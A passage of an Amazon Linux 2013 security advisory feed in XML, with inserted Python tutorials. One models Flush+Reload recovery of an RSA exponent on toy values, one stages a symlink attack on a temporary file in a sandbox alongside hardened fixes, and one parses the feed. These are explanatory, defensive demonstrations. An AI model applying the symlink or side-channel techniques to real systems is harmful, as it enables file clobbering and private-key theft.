</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4242" title="" id="CVE-2013-4242" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="gnupg" version="1.4.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnupg-1.4.14-1.20.amzn1.x86_64.rpm</filename></package><package name="gnupg-debuginfo" version="1.4.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnupg-debuginfo-1.4.14-1.20.amzn1.x86_64.rpm</filename></package><package name="gnupg-debuginfo" version="1.4.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/gnupg-debuginfo-1.4.14-1.20.amzn1.i686.rpm</filename></package><package name="gnupg" version="1.4.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/gnupg-1.4.14-1.20.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-226</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-226: medium priority package update for libgcrypt</title><issued date="2013-09-19 15:49:00" /><updated date="2014-09-16 21:38:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4242:
GnuPG before 1.4.14, and Libgcrypt before 1.5.3 as used in GnuPG 2.0.x and possibly other products, allows local users to obtain private RSA keys via a cache side-channel attack involving the L3 cache, aka Flush+Reload.
988589:
CVE-2013-4242 GnuPG susceptible to Yarom/Falkner flush+reload cache side-channel attack
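<![CDATA[
ALAS-2013-225 and ALAS-2013-226 above both ship the fix for the same flaw, so one illustration serves both. The Yarom/Falkner attack works because textbook square-and-multiply exponentiation calls the multiply routine only for 1-bits of the private exponent; a Flush+Reload probe on that routine's cache lines therefore sees the exponent directly. The Python below is an added example, not GnuPG or libgcrypt code: it models the probe as a recorded list of operations, recovers a toy exponent from that list, and shows the shape of the upstream mitigation (always perform the multiply, discard it on a 0-bit). The numbers are toy-sized constants chosen for illustration; a real implementation must also remove secret-dependent memory access, which this toy does not address.

```python
"""Why an L3-cache probe on the exponentiation code recovers an RSA private
exponent, modelled as an operation trace. Added example, not GnuPG/libgcrypt
code; all values below are constructed for illustration."""


def modexp_square_and_multiply(base, exp, mod, trace):
    """Leaky left-to-right exponentiation: appends 'S' for every squaring and
    'M' for every multiply, so the trace is a function of the exponent bits."""
    acc = 1
    for bit in bin(exp)[2:]:                  # most significant bit first
        acc = (acc * acc) % mod
        trace.append("S")
        if bit == "1":                        # multiply happens only on 1-bits
            acc = (acc * base) % mod
            trace.append("M")
    return acc


def recover_exponent(trace):
    """The attacker's side: each 'S' opens a new bit (assume 0); an 'M'
    immediately after it turns that bit into a 1."""
    bits = []
    for op in trace:
        if op == "S":
            bits.append("0")
        else:                                 # 'M' always follows the 'S' of its bit
            bits[-1] = "1"
    return int("".join(bits), 2)


def modexp_square_and_multiply_always(base, exp, mod, trace):
    """Shape of the mitigation: do the multiply on every bit and keep the
    result only for 1-bits, so the observable sequence depends on the bit
    length alone. The select below is still a branch; real constant-time code
    would make it branch-free and index-free as well."""
    acc = 1
    for bit in bin(exp)[2:]:
        acc = (acc * acc) % mod
        trace.append("S")
        candidate = (acc * base) % mod        # same cache-visible work for 0 and 1
        trace.append("M")
        if bit == "1":
            acc = candidate
    return acc


def demo():
    """Run both strategies on a constructed toy key; returns
    (recovered_exponent, leaky_traces_differ, hardened_traces_identical)."""
    mod, base = 3233, 7                       # toy RSA modulus 61*53, toy base
    d1, d2 = 0b1101, 0b1011                   # two 4-bit "private exponents"
    leak1, leak2, safe1, safe2 = [], [], [], []
    modexp_square_and_multiply(base, d1, mod, leak1)
    modexp_square_and_multiply(base, d2, mod, leak2)
    modexp_square_and_multiply_always(base, d1, mod, safe1)
    modexp_square_and_multiply_always(base, d2, mod, safe2)
    return recover_exponent(leak1), leak1 != leak2, safe1 == safe2


if __name__ == "__main__":
    recovered, leaky_differ, safe_same = demo()
    print("exponent recovered from leaky trace:", bin(recovered))
    print("leaky traces distinguish the two keys:", leaky_differ)
    print("hardened traces are identical:", safe_same)
```

The recovered value in `demo()` is the exponent itself; the only thing the hardened trace still reveals is the bit length, which is public for RSA.
]]>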
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4242" title="" id="CVE-2013-4242" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libgcrypt-debuginfo" version="1.4.5" release="9.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/libgcrypt-debuginfo-1.4.5-9.12.amzn1.x86_64.rpm</filename></package><package name="libgcrypt" version="1.4.5" release="9.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/libgcrypt-1.4.5-9.12.amzn1.x86_64.rpm</filename></package><package name="libgcrypt-devel" version="1.4.5" release="9.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/libgcrypt-devel-1.4.5-9.12.amzn1.x86_64.rpm</filename></package><package name="libgcrypt-debuginfo" version="1.4.5" release="9.12.amzn1" epoch="0" arch="i686"><filename>Packages/libgcrypt-debuginfo-1.4.5-9.12.amzn1.i686.rpm</filename></package><package name="libgcrypt-devel" version="1.4.5" release="9.12.amzn1" epoch="0" arch="i686"><filename>Packages/libgcrypt-devel-1.4.5-9.12.amzn1.i686.rpm</filename></package><package name="libgcrypt" version="1.4.5" release="9.12.amzn1" epoch="0" arch="i686"><filename>Packages/libgcrypt-1.4.5-9.12.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-227</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-227: medium priority package update for nagios</title><issued date="2013-09-24 19:41:00" /><updated date="2014-09-16 21:39:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-2029:
958015:
CVE-2013-2029 Nagios core: Insecure temporary file usage in nagios.upgrade_to_v3.sh
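<![CDATA[
The bug class named above (insecure temporary file usage) is a predictable path under a world-writable directory: a local user pre-creates a symlink at that path, and the privileged script that later opens it for writing clobbers whatever the link points to. The Python below is an added example, not Nagios code and not the upgrade script itself: it stages the scenario in a private sandbox directory rather than the real /tmp, shows that a plain open() for writing follows the planted link, and shows the two fixes a practitioner reaches for (an O_CREAT|O_EXCL|O_NOFOLLOW open that fails closed, and mkstemp(), which leaves nothing to pre-plant). It assumes a POSIX host; os.O_NOFOLLOW is not available on Windows.

```python
"""Symlink attack on a predictable temporary file, and two hardened writers.
Added example for this corpus page; everything it creates lives in a private
TemporaryDirectory that is removed afterwards."""
import os
import tempfile


def naive_write(path, data):
    """The vulnerable pattern: open(path, 'w') truncates and follows whatever
    is already at `path`, a symlink included."""
    with open(path, "w") as f:
        f.write(data)


def safe_write(path, data):
    """Hardened: create-only, never follow a link, private mode. Raises
    FileExistsError (a subclass of OSError) if anything is already there."""
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL | os.O_NOFOLLOW, 0o600)
    with os.fdopen(fd, "w") as f:
        f.write(data)


def unpredictable_tempfile(directory=None):
    """What the script should have used: mkstemp() picks a random name and
    opens it O_CREAT|O_EXCL with mode 0600. Returns (basename, mode bits) and
    removes the file again so the example leaves nothing behind."""
    fd, path = tempfile.mkstemp(prefix="upgrade.", dir=directory)
    mode = os.fstat(fd).st_mode & 0o777
    os.close(fd)
    os.unlink(path)
    return os.path.basename(path), mode


def demo(sandbox=None):
    """Stage the attack inside `sandbox` (a fresh temp dir if None).
    Returns (victim_content_after_naive_write, hardened_open_refused)."""
    if sandbox is None:
        with tempfile.TemporaryDirectory() as d:
            return demo(d)

    victim = os.path.join(sandbox, "victim.conf")        # stands in for a root-owned file
    with open(victim, "w") as f:
        f.write("original\n")

    link = os.path.join(sandbox, "nagios.upgrade.tmp")   # guessable name, constructed here
    os.symlink(victim, link)                             # attacker plants the link first

    naive_write(link, "attacker-controlled\n")           # privileged script runs later
    with open(victim) as f:
        clobbered = f.read()

    try:
        safe_write(link, "attacker-controlled\n")
        refused = False
    except OSError:                                      # O_EXCL sees the link and fails
        refused = True
    return clobbered, refused


if __name__ == "__main__":
    content, refused = demo()
    print("victim after naive write:", content.strip())
    print("hardened open refused:", refused)
    print("mkstemp name and mode:", unpredictable_tempfile())
```

The same check applies to shell scripts: `mktemp` gives the mkstemp() behaviour, while `> /tmp/fixed-name` is the naive_write() behaviour.
]]>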
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2029" title="" id="CVE-2013-2029" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nagios-common" version="3.5.1" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/nagios-common-3.5.1-1.6.amzn1.x86_64.rpm</filename></package><package name="nagios-debuginfo" version="3.5.1" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/nagios-debuginfo-3.5.1-1.6.amzn1.x86_64.rpm</filename></package><package name="nagios-devel" version="3.5.1" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/nagios-devel-3.5.1-1.6.amzn1.x86_64.rpm</filename></package><package name="nagios" version="3.5.1" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/nagios-3.5.1-1.6.amzn1.x86_64.rpm</filename></package><package name="nagios-devel" version="3.5.1" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/nagios-devel-3.5.1-1.6.amzn1.i686.rpm</filename></package><package name="nagios" version="3.5.1" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/nagios-3.5.1-1.6.amzn1.i686.rpm</filename></package><package name="nagios-debuginfo" version="3.5.1" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/nagios-debuginfo-3.5.1-1.6.amzn1.i686.rpm</filename></package><package name="nagios-common" version="3.5.1" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/nagios-common-3.5.1-1.6.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-228</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-228: medium priority package update for kernel</title><issued date="2013-09-24 19:43:00" /><updated date="2014-09-16 21:40:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI 
that fix the following vulnerabilities:
CVE-2013-0343:
The ipv6_create_tempaddr function in net/ipv6/addrconf.c in the Linux kernel through 3.8 does not properly handle problems with the generation of IPv6 temporary addresses, which allows remote attackers to cause a denial of service (excessive retries and address-generation outage), and consequently obtain sensitive information, via ICMPv6 Router Advertisement (RA) messages.
914664:
CVE-2013-0343 kernel: handling of IPv6 temporary addresses
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0343" title="" id="CVE-2013-0343" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools-debuginfo" version="3.4.62" release="53.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-3.4.62-53.42.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.4.62" release="53.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.4.62-53.42.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="3.4.62" release="53.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-3.4.62-53.42.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="3.4.62" release="53.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.4.62-53.42.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="3.4.62" release="53.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-3.4.62-53.42.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="3.4.62" release="53.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.4.62-53.42.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="3.4.62" release="53.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-3.4.62-53.42.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.4.62" release="53.42.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.4.62-53.42.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="3.4.62" release="53.42.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-3.4.62-53.42.amzn1.i686.rpm</filename></package><package name="kernel" version="3.4.62" release="53.42.amzn1" epoch="0" 
arch="i686"><filename>Packages/kernel-3.4.62-53.42.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="3.4.62" release="53.42.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-3.4.62-53.42.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="3.4.62" release="53.42.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.4.62-53.42.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.4.62" release="53.42.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-3.4.62-53.42.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.4.62" release="53.42.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.4.62-53.42.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="3.4.62" release="53.42.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-3.4.62-53.42.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-229</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-229: low priority package update for ruby19</title><issued date="2013-09-26 22:21:00" /><updated date="2014-09-16 21:40:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-2065:
962035:
CVE-2013-2065 Ruby: Object taint bypassing in DL and Fiddle
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2065" title="" id="CVE-2013-2065" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="rubygem19-rake" version="0.9.2.2" release="31.53.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem19-rake-0.9.2.2-31.53.amzn1.noarch.rpm</filename></package><package name="ruby19" version="1.9.3.448" release="31.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-1.9.3.448-31.53.amzn1.x86_64.rpm</filename></package><package name="ruby19-irb" version="1.9.3.448" release="31.53.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby19-irb-1.9.3.448-31.53.amzn1.noarch.rpm</filename></package><package name="rubygem19-json" version="1.5.5" release="31.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem19-json-1.5.5-31.53.amzn1.x86_64.rpm</filename></package><package name="ruby19-doc" version="1.9.3.448" release="31.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-doc-1.9.3.448-31.53.amzn1.x86_64.rpm</filename></package><package name="ruby19-libs" version="1.9.3.448" release="31.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-libs-1.9.3.448-31.53.amzn1.x86_64.rpm</filename></package><package name="rubygem19-rdoc" version="3.9.5" release="31.53.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem19-rdoc-3.9.5-31.53.amzn1.noarch.rpm</filename></package><package name="rubygems19-devel" version="1.8.23" release="31.53.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems19-devel-1.8.23-31.53.amzn1.noarch.rpm</filename></package><package name="rubygem19-io-console" version="0.3" release="31.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem19-io-console-0.3-31.53.amzn1.x86_64.rpm</filename></package><package name="ruby19-debuginfo" version="1.9.3.448" release="31.53.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/ruby19-debuginfo-1.9.3.448-31.53.amzn1.x86_64.rpm</filename></package><package name="rubygems19" version="1.8.23" release="31.53.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems19-1.8.23-31.53.amzn1.noarch.rpm</filename></package><package name="rubygem19-bigdecimal" version="1.1.0" release="31.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem19-bigdecimal-1.1.0-31.53.amzn1.x86_64.rpm</filename></package><package name="rubygem19-minitest" version="2.5.1" release="31.53.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem19-minitest-2.5.1-31.53.amzn1.noarch.rpm</filename></package><package name="ruby19-devel" version="1.9.3.448" release="31.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-devel-1.9.3.448-31.53.amzn1.x86_64.rpm</filename></package><package name="ruby19-debuginfo" version="1.9.3.448" release="31.53.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-debuginfo-1.9.3.448-31.53.amzn1.i686.rpm</filename></package><package name="rubygem19-io-console" version="0.3" release="31.53.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem19-io-console-0.3-31.53.amzn1.i686.rpm</filename></package><package name="rubygem19-bigdecimal" version="1.1.0" release="31.53.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem19-bigdecimal-1.1.0-31.53.amzn1.i686.rpm</filename></package><package name="ruby19-doc" version="1.9.3.448" release="31.53.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-doc-1.9.3.448-31.53.amzn1.i686.rpm</filename></package><package name="ruby19-devel" version="1.9.3.448" release="31.53.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-devel-1.9.3.448-31.53.amzn1.i686.rpm</filename></package><package name="ruby19-libs" version="1.9.3.448" release="31.53.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-libs-1.9.3.448-31.53.amzn1.i686.rpm</filename></package><package name="rubygem19-json" version="1.5.5" release="31.53.amzn1" epoch="0" 
arch="i686"><filename>Packages/rubygem19-json-1.5.5-31.53.amzn1.i686.rpm</filename></package><package name="ruby19" version="1.9.3.448" release="31.53.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-1.9.3.448-31.53.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-230</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-230: medium priority package update for rubygems</title><issued date="2013-09-26 22:22:00" /><updated date="2014-09-16 21:40:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4287:
1002364:
CVE-2013-4287 rubygems: version regex algorithmic complexity vulnerability
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4287" title="" id="CVE-2013-4287" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="rubygems-devel" version="1.8.25" release="7.12.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems-devel-1.8.25-7.12.amzn1.noarch.rpm</filename></package><package name="rubygems" version="1.8.25" release="7.12.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems-1.8.25-7.12.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-231</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-231: medium priority package update for rubygems</title><issued date="2013-10-16 20:52:00" /><updated date="2014-09-16 21:41:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4363:
1009720:
CVE-2013-4363 rubygems: version regex algorithmic complexity vulnerability, incomplete CVE-2013-4287 fix
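<![CDATA[
This advisory supersedes ALAS-2013-230 with the same rubygems version at a higher release (7.12.amzn1 to 8.12.amzn1), which is exactly the comparison a consumer of this feed has to get right, epoch included (compare the epoch="2" xinetd builds later in this file). The Python below is an added example, not Amazon Linux tooling: a parser for the updateinfo layout used in this file (update > id/severity/references/pkglist > collection > package) plus a re-implementation of rpm's version ordering, run against a constructed inventory. The sample feed is constructed for the example; it keeps the field values of the three advisories named in it but trims everything else.

```python
"""Consume a yum updateinfo.xml feed and report which advisories still apply
to an installed package set. Added example, not Amazon Linux tooling; the feed
and inventory below are constructed samples."""
import re
import xml.etree.ElementTree as ET

SAMPLE_UPDATEINFO = """<updates>
<update status="final" version="1.4" type="security">
 <id>ALAS-2013-230</id><severity>medium</severity>
 <references><reference id="CVE-2013-4287" type="cve"
   href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4287"/></references>
 <pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name>
  <package name="rubygems" version="1.8.25" release="7.12.amzn1" epoch="0" arch="noarch"/>
 </collection></pkglist>
</update>
<update status="final" version="1.4" type="security">
 <id>ALAS-2013-231</id><severity>medium</severity>
 <references><reference id="CVE-2013-4363" type="cve"
   href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4363"/></references>
 <pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name>
  <package name="rubygems" version="1.8.25" release="8.12.amzn1" epoch="0" arch="noarch"/>
 </collection></pkglist>
</update>
<update status="final" version="1.4" type="security">
 <id>ALAS-2013-232</id><severity>medium</severity>
 <references><reference id="CVE-2013-4342" type="cve"
   href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4342"/></references>
 <pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name>
  <package name="xinetd" version="2.3.14" release="39.9.amzn1" epoch="2" arch="x86_64"/>
 </collection></pkglist>
</update>
</updates>"""

_SEGMENT = re.compile(r"[0-9]+|[a-zA-Z]+|~")


def rpmvercmp(a, b):
    """Order two version or release strings the way librpm's rpmvercmp does
    (caret handling omitted): split into numeric runs, alphabetic runs and '~';
    numeric runs compare as integers and outrank alphabetic runs; '~' sorts
    before anything, including end of string (1.0~rc1 < 1.0). Returns -1/0/1."""
    if a == b:
        return 0
    sa, sb = _SEGMENT.findall(a), _SEGMENT.findall(b)
    for x, y in zip(sa, sb):
        if "~" in (x, y):
            if x != y:
                return -1 if x == "~" else 1
            continue
        if x.isdigit() and y.isdigit():
            if int(x) != int(y):
                return 1 if int(x) > int(y) else -1
        elif x.isdigit() != y.isdigit():
            return 1 if x.isdigit() else -1
        elif x != y:
            return 1 if x > y else -1
    if len(sa) == len(sb):
        return 0
    a_longer = len(sa) > len(sb)
    rest = sa[len(sb)] if a_longer else sb[len(sa)]    # first unmatched segment
    if rest == "~":
        return -1 if a_longer else 1
    return 1 if a_longer else -1


def evr_cmp(evr1, evr2):
    """Order two (epoch, version, release) triples. Epoch dominates, which is
    why an epoch-0 2.3.15 build is older than 2:2.3.14-39.9.amzn1."""
    (e1, v1, r1), (e2, v2, r2) = evr1, evr2
    if int(e1) != int(e2):
        return 1 if int(e1) > int(e2) else -1
    return rpmvercmp(v1, v2) or rpmvercmp(r1, r2)


def parse_updateinfo(xml_text):
    """Return [(advisory_id, severity, [cve, ...], [(name, (epoch, version, release), arch), ...])]."""
    out = []
    for upd in ET.fromstring(xml_text).findall("update"):
        cves = [r.get("id") for r in upd.iter("reference") if r.get("type") == "cve"]
        pkgs = [(p.get("name"), (p.get("epoch", "0"), p.get("version"), p.get("release")), p.get("arch"))
                for p in upd.iter("package")]
        out.append((upd.findtext("id"), upd.findtext("severity"), cves, pkgs))
    return out


def outstanding_advisories(xml_text, installed):
    """`installed` maps (name, arch) -> (epoch, version, release), as produced by
    rpm -qa --qf '%{NAME} %{ARCH} %{EPOCHNUM} %{VERSION} %{RELEASE}\\n'.
    Returns {advisory_id: cves} for each advisory shipping a build newer than
    the installed one for at least one of its packages."""
    result = {}
    for adv, _sev, cves, pkgs in parse_updateinfo(xml_text):
        if any(evr_cmp(installed[(n, a)], evr) < 0 for n, evr, a in pkgs if (n, a) in installed):
            result[adv] = cves
    return result


INSTALLED = {   # constructed inventory: rubygems has the -230 build, not -231
    ("rubygems", "noarch"): ("0", "1.8.25", "7.12.amzn1"),
    ("xinetd", "x86_64"): ("2", "2.3.14", "39.9.amzn1"),
}

if __name__ == "__main__":
    for adv, cves in outstanding_advisories(SAMPLE_UPDATEINFO, INSTALLED).items():
        print(adv, "still applies:", ", ".join(cves))
```

Against the constructed inventory only ALAS-2013-231 is reported: the rubygems version strings are identical and the decision comes entirely from the release compare, the case a naive string comparison of "version" alone would miss.
]]>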
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4363" title="" id="CVE-2013-4363" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="rubygems" version="1.8.25" release="8.12.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems-1.8.25-8.12.amzn1.noarch.rpm</filename></package><package name="rubygems-devel" version="1.8.25" release="8.12.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems-devel-1.8.25-8.12.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-232</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-232: medium priority package update for xinetd</title><issued date="2013-10-16 20:53:00" /><updated date="2014-09-16 21:41:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4342:
It was found that xinetd ignored the user and group configuration directives for services running under the tcpmux-server service. This flaw could cause the associated services to run as root. If there was a flaw in such a service, a remote attacker could use it to execute arbitrary code with the privileges of the root user.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4342" title="" id="CVE-2013-4342" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:1409.html" title="" id="RHSA-2013:1409" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="xinetd-debuginfo" version="2.3.14" release="39.9.amzn1" epoch="2" arch="x86_64"><filename>Packages/xinetd-debuginfo-2.3.14-39.9.amzn1.x86_64.rpm</filename></package><package name="xinetd" version="2.3.14" release="39.9.amzn1" epoch="2" arch="x86_64"><filename>Packages/xinetd-2.3.14-39.9.amzn1.x86_64.rpm</filename></package><package name="xinetd" version="2.3.14" release="39.9.amzn1" epoch="2" arch="i686"><filename>Packages/xinetd-2.3.14-39.9.amzn1.i686.rpm</filename></package><package name="xinetd-debuginfo" version="2.3.14" release="39.9.amzn1" epoch="2" arch="i686"><filename>Packages/xinetd-debuginfo-2.3.14-39.9.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-233</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-233: medium priority package update for kernel</title><issued date="2013-10-16 20:53:00" /><updated date="2014-09-16 21:43:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4387:
net/ipv6/ip6_output.c in the Linux kernel through 3.11.4 does not properly determine the need for UDP Fragmentation Offload (UFO) processing of small packets after the UFO queueing of a large packet, which allows remote attackers to cause a denial of service (memory corruption and system crash) or possibly have unspecified other impact via network traffic that triggers a large response packet.
1011927:
CVE-2013-4387 Kernel: net: IPv6: panic when UFO=On for an interface
CVE-2013-4299:
1004233:
CVE-2013-4299 kernel: dm: dm-snapshot data leak
* An information leak flaw was found in the way the Linux kernel's device mapper subsystem, under certain conditions, interpreted data written to snapshot block devices. An attacker could use this flaw to read data from disk blocks in free space, which are normally inaccessible.
CVE-2013-4162:
The udp_v6_push_pending_frames function in net/ipv6/udp.c in the IPv6 implementation in the Linux kernel through 3.10.3 makes an incorrect function call for pending data, which allows local users to cause a denial of service (BUG and system crash) via a crafted application that uses the UDP_CORK option in a setsockopt system call.
987627:
CVE-2013-4162 Kernel: net: panic while pushing pending data out of a IPv6 socket with UDP_CORK enabled
* A flaw was found in the way the Linux kernel's TCP/IP protocol suite implementation handled IPv6 sockets that used the UDP_CORK option. A local, unprivileged user could use this flaw to cause a denial of service.
CVE-2013-2141:
The do_tkill function in kernel/signal.c in the Linux kernel before 3.8.9 does not initialize a certain data structure, which allows local users to obtain sensitive information from kernel memory via a crafted application that makes a (1) tkill or (2) tgkill system call.
970873:
CVE-2013-2141 Kernel: signal: information leak in tkill/tgkill
* An information leak flaw in the Linux kernel could allow a local, unprivileged user to leak kernel memory to user-space.
CVE-2012-4398:
The __request_module function in kernel/kmod.c in the Linux kernel before 3.4 does not set a certain killable attribute, which allows local users to cause a denial of service (memory consumption) via a crafted application.
853474:
CVE-2012-4398 kernel: request_module() OOM local DoS
* It was found that a deadlock could occur in the Out of Memory (OOM) killer. A process could trigger this deadlock by consuming a large amount of memory, and then causing request_module() to be called. A local, unprivileged user could use this flaw to cause a denial of service (excessive memory consumption).
